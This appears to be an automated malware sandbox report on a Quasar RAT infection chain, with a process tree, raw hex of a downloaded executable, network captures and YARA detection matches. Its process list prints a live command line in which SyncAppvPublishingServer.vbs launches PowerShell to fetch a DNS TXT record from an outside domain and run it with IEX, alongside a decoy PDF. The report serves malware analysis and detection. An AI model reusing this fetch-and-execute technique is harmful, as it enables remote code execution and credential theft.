2024-12-18 22:06:17 UTC	7937	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 30 74 70 39 51 1a 23 39 51 1a 23 39 51 1a 23 8d cd eb 23 2c 51 1a 23 8d cd e9 23 a5 51 1a 23 8d cd e8 23 18 51 1a 23 a7 f1 dd 23 38 51 1a 23 6b 39 1f 22 17 51 1a 23 6b 39 1e 22 28 51 1a 23 6b 39 19 22 31 51 1a 23 30 29 99 23 31 51 1a 23 30 29 9d 23 38 51 1a 23 30 29 89 23 1c 51 1a 23 39 51 1b 23 14 53 1a 23 9c 38 14 22 68 51 1a 23 9c 38 19 22 38 51 1a 23 9c 38 e5 23 38 51 1a Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$}0tp9Q#9Q#9Q##,Q##Q##Q##8Q#k9"Q#k9"(Q#k9"1Q#0)#1Q#0)#8Q#0)#Q#9Q#S#8"hQ#8"8Q#8#8Q
2024-12-18 22:06:17 UTC	8000	IN	Data Raw: 02 00 00 00 45 33 c0 89 05 c6 0a 0f 00 33 d2 b9 01 20 00 00 ff 15 cd 40 0b 00 48 83 c4 28 c3 40 53 48 83 ec 20 33 c0 49 8b d8 38 05 20 e9 0e 00 74 66 48 89 0d 6e e8 0e 00 89 05 70 e8 0e 00 89 05 5a e8 0e 00 ff 15 ac 43 0b 00 48 8d 0d 21 a8 06 00 89 05 af e8 0e 00 e8 72 6d 02 00 b9 01 00 00 00 e8 cc 6d 02 00 e8 6b ff ff ff 48 8b d3 e8 a3 0f 00 00 44 8b 05 58 0a 0f 00 33 d2 b9 01 20 00 00 44 8d 4a 02 ff 15 5b 40 0b 00 8b 05 1d e8 0e 00 48 83 c4 20 5b c3 b8 01 00 00 00 eb f3 48 89 5c 24 10 48 89 74 24 18 48 89 4c 24 08 57 b8 20 00 01 00 e8 d6 69 04 00 48 2b e0 41 8b d8 48 8b fa e8 3c 3d 00 00 33 f6 84 c0 0f 84 9f 00 00 00 e8 e9 05 00 00 85 c0 0f 88 92 00 00 00 e8 c0 03 00 00 85 c0 0f 88 85 00 00 00 48 8b 0f 4c 8d 8c 24 30 00 01 00 4c 8d 44 24 20 ba ff 7f 00 Data Ascii: E33 @H(@SH 3I8 tfHnpZCH!rmmkHDX3 DJ[@H [H\$Ht$HL$W iH+AH<=3HL$0LD$
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: 98 00 00 48 8d 4d 97 4c 8b f0 e8 80 1c 00 00 48 8d 4d b7 e8 97 c3 00 00 8b 7d 0f 48 8d 4d 97 e8 8b 1b 00 00 48 8d 55 97 48 8d 4d d7 e8 62 01 00 00 48 8b 75 97 48 8d 0d 73 28 0b 00 48 8b d6 e8 a3 49 02 00 85 c0 0f 84 c1 6e 04 00 48 8b d6 48 8d 0d 79 28 0b 00 e8 8c 49 02 00 85 c0 0f 84 c8 6e 04 00 48 8b d6 48 8d 0d 8a 28 0b 00 e8 75 49 02 00 85 c0 0f 84 cf 6e 04 00 48 8b d6 48 8d 0d 9b 28 0b 00 e8 5e 49 02 00 85 c0 0f 84 02 6f 04 00 4c 39 3d 17 ca 0e 00 75 1b 48 8d 55 97 49 8b cc e8 f1 0b 00 00 48 8d 55 97 2b fb 48 8d 4d d7 e8 de 00 00 00 85 ff 41 8b f7 49 8b ce 0f 49 f7 e8 1e 65 00 00 44 8d 46 01 8b d3 48 8b c8 4c 8b f0 e8 c9 61 00 00 45 33 c9 89 75 b7 44 8b c3 4c 89 7d bf 48 8d 55 b7 89 5d c7 49 8b ce e8 fd 59 00 00 48 8d 4d b7 e8 b4 c2 00 00 41 8b ff 85 Data Ascii: HMLHM}HMHUHMbHuHs(HInHHy(InHH(uInHH(^IoL9=uHUIHU+HMAIIeDFHLaE3uDL}HU]IYHMA
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: 4a 89 04 09 48 8d 49 08 48 8b 15 c0 c8 0e 00 48 8b 5b 10 44 3b c2 7d 09 4c 8b 0d b8 c8 0e 00 eb d9 41 bc 01 00 00 00 4c 63 fa 48 8d 05 06 0b 0b 00 48 89 7d e8 48 89 45 e0 49 ff c7 4c 8b ef 48 89 7d f0 49 8d 4c 24 fe 48 89 7d f8 41 8d 44 24 1f 45 8b f4 49 f7 e7 48 0f 40 c1 48 83 c0 08 48 0f 42 c1 48 8b c8 e8 7c e8 01 00 48 85 c0 0f 84 99 00 00 00 48 8d 58 08 4c 89 38 48 8b cb 4c 8d 0d e2 fa ff ff 4d 8b c7 41 8d 54 24 1f e8 8d fa ff ff 48 89 1d ae c8 0e 00 41 8b d6 e8 72 00 00 00 48 85 c0 74 36 66 83 38 3b 0f 84 01 60 04 00 4c 8d 4d e0 4c 8b c0 e8 e3 07 00 00 85 c0 78 1f 49 63 ce 48 8d 55 e0 48 c1 e1 05 48 03 0d 75 c8 0e 00 e8 b8 00 00 00 41 ff c6 eb bd 40 b7 01 48 8d 4d e0 e8 1b 02 00 00 40 8a c7 4c 8d 5c 24 50 49 8b 5b 38 49 8b 7b 40 49 8b e3 41 5f 41 5e Data Ascii: JHIHH[D;}LALcHH}HEILH}IL$H}AD$EIH@HHBH\|HHXL8HLMAT$HArHt6f8;`LMLxIcHUHHuA@HM@L\$PI[8I{@IA_A^
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: cb 1a 00 00 48 8b 47 08 48 8b 73 08 48 8b 58 08 48 8b cb e8 b7 1a 00 00 48 83 7f 10 03 b8 01 00 00 00 4c 8b 73 08 41 8b dc 89 45 78 72 1b 48 8b 47 08 48 8b 48 10 e8 98 6d 00 00 8b d8 83 f8 04 8b 45 78 0f 87 2e 4f 04 00 48 83 7f 10 04 0f 83 2b 4f 04 00 83 f8 01 0f 8c 35 4f 04 00 ff c8 48 8d 4d 80 49 8b d6 89 45 78 e8 a5 2e 00 00 8b f8 85 c0 0f 85 24 4f 04 00 48 8d 4d 80 e8 72 30 00 00 48 89 75 80 44 88 65 88 48 8b 46 08 89 45 a0 85 db 0f 84 65 4f 04 00 48 8d 4c 24 60 e8 8d dc ff ff 83 fb 01 0f 84 84 4f 04 00 83 fb 02 0f 84 5b 50 04 00 83 fb 03 0f 85 05 52 04 00 4c 8b 55 a8 48 8d 3d b7 ea 0a 00 4c 8b 74 24 78 49 8b c4 48 89 7c 24 40 4d 8b ec 48 89 45 d8 48 c7 c6 ff ff ff ff 48 89 44 24 58 4c 89 64 24 48 4c 89 64 24 50 44 8b 45 78 44 8b 4d a0 48 8b 4d 90 48 Data Ascii: HGHsHXHHLsAExrHGHHmEx.OH+O5OHMIEx.$OHMr0HuDeHFEeOHL$`O[PRLUH=Lt$xIH\|$@MHEHHD$XLd$HLd$PDExDMHMH
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5e c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 30 8b 79 08 48 8b ea 4c 8b 01 48 8b f1 83 60 f0 00 33 d2 48 83 60 e8 00 b9 e9 fd 00 00 44 8d 4f 01 ff 15 a9 ba 0a 00 4c 63 f0 85 c0 0f 84 8a dd 04 00 b8 02 00 00 00 49 f7 e6 48 c7 c2 ff ff ff ff 48 0f 40 c2 48 8b c8 e8 f3 a9 01 00 4c 8b 06 44 8d 4f 01 33 d2 44 89 74 24 28 b9 e9 fd 00 00 48 89 44 24 20 48 8b d8 ff 15 62 ba 0a 00 45 33 c0 48 8b d3 ff c8 48 8b cd 4c 63 c8 e8 23 00 00 00 48 8b cb e8 73 a9 01 00 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5e c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 20 49 8d 41 ff 49 8b f1 49 8b e8 4c 8b f2 48 8b f9 48 83 f8 fd 0f 87 ad 00 00 00 45 33 Data Ascii: t$PH\|$XH0A^HHXHhHpHx AVH0yHLH`3H`DOLcIHH@HLDO3Dt$(HD$ HbE3HHLc#HsH\$@Hl$HHt$PH\|$XH0A^H\$Hl$Ht$WAVAWH IAIILHHE3
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: c4 20 5b c3 ff 15 9d a0 0a 00 48 83 23 00 eb e1 cc cc cc 48 83 ec 78 65 48 8b 04 25 58 00 00 00 ba 04 00 00 00 48 8b 08 8b 04 0a 39 05 ce 6d 0e 00 7f 63 83 3d 15 33 0e 00 0a 75 18 48 8b 05 fc 32 0e 00 83 38 2a 75 0c 48 8d 05 f0 32 0e 00 48 83 c4 78 c3 48 8d 15 9c ac 0a 00 48 8d 4c 24 20 e8 4a 12 00 00 45 33 c0 48 8d 4c 24 40 4c 8b c8 41 8d 50 2a e8 0a 86 01 00 48 8d 54 24 40 48 8d 0d ba 32 0e 00 e8 ad 67 01 00 48 8d 4c 24 48 e8 fb 9e ff ff eb b2 48 8d 0d 62 6d 0e 00 e8 39 8f 01 00 83 3d 56 6d 0e 00 ff 75 88 48 8d 0d 79 d6 03 00 e8 1c 8d 01 00 48 8d 0d 41 6d 0e 00 e8 b8 8e 01 00 e9 6b ff ff ff cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 42 08 49 8b f8 48 8b 08 e8 6f 2e 00 00 8b d0 e8 d4 00 00 00 48 8b cf 8b d8 e8 ba 45 00 00 89 1f 33 c0 48 8b 5c 24 30 c7 Data Ascii: [H#HxeH%XH9mc=3uH28uH2HxHHL$ JE3HL$@LAPHT$@H2gHL$HHbm9=VmuHyHAmkH\$WH HBIHo.HE3H\$0
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: ff ff 41 b4 01 48 8b 06 8b 9d c8 00 00 00 48 8b 48 30 49 89 4f 38 48 8b 06 48 8b 48 38 49 89 4e 30 48 8b 0e 48 8b 05 ec 4e 0e 00 48 89 41 30 48 8b 0e 48 8b 05 d6 4e 0e 00 48 89 41 38 45 84 e4 0f 84 66 03 00 00 48 8b 0e 48 85 c9 0f 84 5a 03 00 00 8b 41 20 48 8b 71 28 25 00 ff 00 00 89 44 24 34 48 85 f6 0f 84 06 03 00 00 8b 44 24 34 0f ba e0 08 0f 82 8f bd 04 00 44 0f b6 74 24 30 0f ba e0 0a 0f 82 1c bb 04 00 40 b7 01 40 88 7c 24 31 f6 c3 01 74 65 83 fb 01 0f 85 3d bb 04 00 48 83 3d e8 4a 0e 00 00 0f 84 7b bb 04 00 80 3d ec 4a 0e 00 00 0f 85 88 bb 04 00 48 8b 1d d6 4a 0e 00 4c 8b c3 49 8b d5 e8 f3 04 00 00 84 c0 74 2b 48 8b 0b 48 85 c9 74 23 8b 41 20 25 00 ff 00 00 89 44 24 34 48 8b 41 28 48 85 c0 74 0e f7 44 24 34 00 02 00 00 0f 85 6d bc 04 00 f6 85 c8 00 Data Ascii: AHHH0IO8HHH8IN0HHNHA0HHNHA8EfHHZA Hq(%D$4HD$4Dt$0@@\|$1te=H=J{=JHJLIt+HHt#A %D$4HA(HtD$4m
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: 48 85 c0 74 20 44 0f b7 02 44 0f b7 09 66 45 3b c1 0f 85 f9 fb ff ff 48 83 c2 02 48 83 c1 02 48 83 e8 01 75 e0 33 c0 e9 f5 fb ff ff 48 8b 5f 30 48 85 db 0f 84 4f fa ff ff 48 8b d3 49 8b cc e8 f3 14 01 00 4c 8b 54 24 70 84 c0 74 1d 48 8b 43 38 48 89 47 30 49 8b 02 48 89 43 38 49 89 1a 48 83 7b 30 00 0f 84 1e fa ff ff 49 8b 02 48 89 46 30 49 8b 32 48 8b 46 30 49 89 02 45 33 db e9 7a f9 ff ff 41 ff c6 33 c0 44 8b c0 4a 8b 0c f2 41 8b c6 0f b7 41 08 66 83 f8 47 0f 84 95 a5 04 00 66 83 f8 48 0f 84 09 01 00 00 66 83 f8 40 74 05 41 ff c6 eb d6 45 85 c0 0f 84 02 fd ff ff eb f0 49 8b d4 48 8b cb e8 6c 14 01 00 4c 8b 54 24 70 84 c0 74 1d 48 8b 43 30 48 89 47 38 49 8b 02 48 89 43 30 49 89 1a 48 83 7b 38 00 0f 84 97 f9 ff ff 49 8b 02 49 89 46 38 4d 8b 32 49 8b 46 38 Data Ascii: Ht DDfE;HHHu3H_0HOHILT$ptHC8HG0IHC8IH{0IHF0I2HF0IE3zA3DJAAfGfHf@tAEIHlLT$ptHC0HG8IHC0IH{8IIF8M2IF8
2024-12-18 22:06:18 UTC	8000	IN	Data Raw: 4d 85 db 0f 84 a5 ba 04 00 48 85 c9 0f 84 49 05 00 00 49 8b 02 4c 3b d9 0f 82 ea 00 00 00 49 8b cb 4d 85 db 74 25 4d 8b 09 4c 2b c8 0f 1f 00 41 0f b7 14 01 44 0f b7 00 66 41 3b d0 0f 85 e8 00 00 00 48 83 c0 02 49 2b cc 75 e4 33 c0 85 c0 0f 88 63 04 00 00 0f 8f 00 05 00 00 41 0f b6 f4 49 8b 42 30 49 89 46 38 48 8b 05 81 0c 0e 00 48 8b 48 38 49 89 4f 30 48 8b 05 72 0c 0e 00 48 8b 0d 13 10 0e 00 48 89 48 30 48 8b 05 60 0c 0e 00 48 8b 0d f9 0f 0e 00 48 89 48 38 40 84 f6 0f 84 08 07 00 00 48 8b 1d 45 0c 0e 00 48 85 db 0f 84 f8 06 00 00 8b 43 20 48 8b 5b 28 25 00 ff 00 00 45 33 f6 e9 25 fd ff ff 73 1d 48 8b 41 38 49 89 43 30 48 8b 03 48 89 41 38 48 89 0b 48 83 79 30 00 0f 84 cb 03 00 00 48 8b 03 48 c7 c6 ff ff ff ff 4c 8b 4c 24 48 49 89 45 30 4c 8b 2b 4d 8b 5d Data Ascii: MHIIL;IMt%ML+ADfA;HI+u3cAIB0IF8HHH8IO0HrHHH0H`HHH8@HEHC H[(%E3%sHA8IC0HHA8HHy0HHLL$HIE0L+M]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49829	108.181.61.49	443	7284	C:\Windows\Tasks\winver.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 22:07:32 UTC	150	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
2024-12-18 22:07:32 UTC	223	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 22:07:32 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-12-18 22:07:32 UTC	1021	IN	Data Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.189", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo

Target ID:	0
Start time:	17:05:57
Start date:	18/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX"
Imagebase:	0x7ff69ed10000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:05:58
Start date:	18/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:05:58
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:06:07
Start date:	18/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c start "" "C:\Windows\Tasks\62rgx9T9MW.pdf"
Imagebase:	0x7ff6e4590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:06:07
Start date:	18/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Windows\Tasks\62rgx9T9MW.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	17:06:11
Start date:	18/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	17:06:11
Start date:	18/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	17:06:11
Start date:	18/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1720,i,1813560832827388052,3977061367603789960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	17:06:18
Start date:	18/12/2024
Path:	C:\Windows\Tasks\winver.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc
Imagebase:	0x7ff63d790000
File size:	1'071'704 bytes
MD5 hash:	8FA52F316C393496F272357191DB6DEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2940913887.0000000000280000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2941396332.0000000000320000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2941354870.0000000000310000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekshen Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Function 00007FFD9B7FBBB9 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

iL_H, xrefs: 00007FFD9B7FBBEF

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd

Similarity

API ID:
String ID: iL_H
API String ID: 0-1540266760
Opcode ID: 6831867d28c24325e6e81603082e63db83b37f5ece297aac153b55c675057289
Instruction ID: 47226e11a1d96a0d391638ba06804942f52ee153e0ef123c772ecd5b787d2c23
Opcode Fuzzy Hash: 6831867d28c24325e6e81603082e63db83b37f5ece297aac153b55c675057289
Instruction Fuzzy Hash: A811AF71E19A8E4FEB54AB6488695ED7FB1EF94300F0101F6D419CB2E7DE2469018780

Function 00007FFD9B8C257A Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1939434298.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055e41b03e3aac34bfde0fefbc32f502ab5f0a83090d5d7fbb372b6d21f4a2f5
Instruction ID: e7c77660d5eb00bb509e0a8a87b2fa1a8b8f132d5778478d0db66412b01a253a
Opcode Fuzzy Hash: 055e41b03e3aac34bfde0fefbc32f502ab5f0a83090d5d7fbb372b6d21f4a2f5
Instruction Fuzzy Hash: F6D147B2B0EA8D4FE7A5EBA888659B57BD1EF59314B1900FBD04DC71E3DA18AD04C341

Function 00007FFD9B8C7BCD Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1939434298.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba6ba1c83dfeb2962848077bc8554c47930372215e3668c48444e242069adc7
Instruction ID: ac41b6f1032ea454820f75f14e51525a9420c327b8dc8a8ac8a8a9b15f524335
Opcode Fuzzy Hash: 7ba6ba1c83dfeb2962848077bc8554c47930372215e3668c48444e242069adc7
Instruction Fuzzy Hash: C351FBA6B0FA8B0FEBB6AB6814716B477D1EF59250F1900FBD149C71E7ED09AD018341

Function 00007FFD9B8CA3C9 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1939434298.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a42ad269e5c030c989d34cf1b6747cce899de5957990ee17e15254c23317e8d4
Instruction ID: 2448d19a41c6d5684466ebdd6a61773b592748ce2b8ddc4152dc4b3fc69316e6
Opcode Fuzzy Hash: a42ad269e5c030c989d34cf1b6747cce899de5957990ee17e15254c23317e8d4
Instruction Fuzzy Hash: 80512862B1FA8E1FEBB9A7A854752B872D1EF49210F0900BFD449C21E7ED29BD018341

Function 00007FFD9B8C7C9A Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1939434298.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68d9cefc1b9d4dce0bb408867f57ffca12ee95379025d39a25387963067b391
Instruction ID: de9ee03458658fea2deb08c0bc55ac3360b49d767a13ae4d5d0b50626b7cb0d5
Opcode Fuzzy Hash: b68d9cefc1b9d4dce0bb408867f57ffca12ee95379025d39a25387963067b391
Instruction Fuzzy Hash: 8631A5ABF0FA8B0FF7B57BA814752B865C1AF58260F5900BBD54DC61EBEC0D6D004245

Function 00007FFD9B8CA417 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1939434298.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5ce96cca77e4aab4f4bb9921a85702323e363111624efcb48730bb9dad1e40
Instruction ID: 982d3e1261f0840e76500084befca457fea1820f7f26017bf8d2f4d3598fbb77
Opcode Fuzzy Hash: fd5ce96cca77e4aab4f4bb9921a85702323e363111624efcb48730bb9dad1e40
Instruction Fuzzy Hash: 6031E6A2B1FA8E1FFBB9A7D814791B866C1EF59250B4900BFD449C21E7ED2DAD408701

Function 00007FFD9B7FBE91 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1938896047.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

